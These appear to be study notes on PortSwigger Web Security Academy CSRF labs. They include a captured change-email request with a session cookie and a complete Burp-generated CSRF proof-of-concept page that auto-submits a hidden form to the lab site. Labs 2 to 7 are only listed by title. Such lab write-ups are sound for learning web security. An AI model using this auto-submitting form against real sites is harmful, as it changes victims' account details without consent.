labs
Lab - 1: CSRF vulnerability with no defenses (A)
POST /my-account/change-email HTTP/1.1
...
Cookie: session=3nunxpjn62UDgxNf0EBecuvWuJ846cEB
email=test%40test.com<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>
history.pushState("", "", "/");
</script>
<form
action="https://0a1e000d048c5fcac0b6760e001100a9.web-security-academy.net/my-account/change-email"
method="POST"
>
<input type="hidden" name="email" value="test@test2.com" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>Lab - 2: CSRF where token validation depends on request method (P)
Lab - 3: CSRF where token validation depends on token being present (P)
Lab - 4: CSRF where token is not tied to user session (P)
Lab - 5: CSRF where token is tied to non-session cookie (P)
Lab - 6: CSRF where token is duplicated in cookie (P)
Lab - 7: CSRF where Referer validation depends on header being present (P)
Last updated